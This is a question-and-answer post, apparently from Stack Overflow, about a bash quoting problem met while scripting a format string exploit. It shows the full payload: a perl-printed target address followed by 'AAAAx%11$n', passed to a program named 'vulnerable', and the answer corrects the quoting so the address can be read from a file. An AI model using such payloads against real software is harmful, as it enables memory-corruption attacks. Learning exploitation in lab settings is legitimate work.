
Bash - File content in perl print statement


I'm writing a format string exploit script for a vulnerable program.

I'm able to exploit the vulnerability by executing the program with the following input:

./vulnerable `perl -e 'print "\x11\x11\x11\x40\x99\x04\x08"'`'AAAAx%11$n'

Here \x40\x99\x04\x08 is the address of a variable in vulnerable.

I want to write a script that generates this input without a hard-coded address. In my script I retrieve the address of the variable and store it in address.txt. Then I try to call vulnerable from my script as I did before, but with the content of address.txt:

./vulnerable $(perl -e 'print "\x11\x11\x11$(<address.txt)"')'AAAAx%11$n'

The content of address.txt is \x40\x99\x04\x08 so there is something wrong with the way I provide the content of address.txt to the perl print statement.

I've also tried leaving out the $() around perl:

./vulnerable `perl -e 'print "\x11\x11\x11$(<address.txt)"'`'AAAAx%11$n'

But this renders the same result.

What am I doing wrong?


Solution

  • Single quotes don't expand $(...).

    ./vulnerable $(perl -e 'print "\x11\x11\x11'$(<address.txt)'"')'AAAAx%11$n'
    #                                           <------------->
    #                      <------------------->               <->
    #            <------------------------------------------------><---------->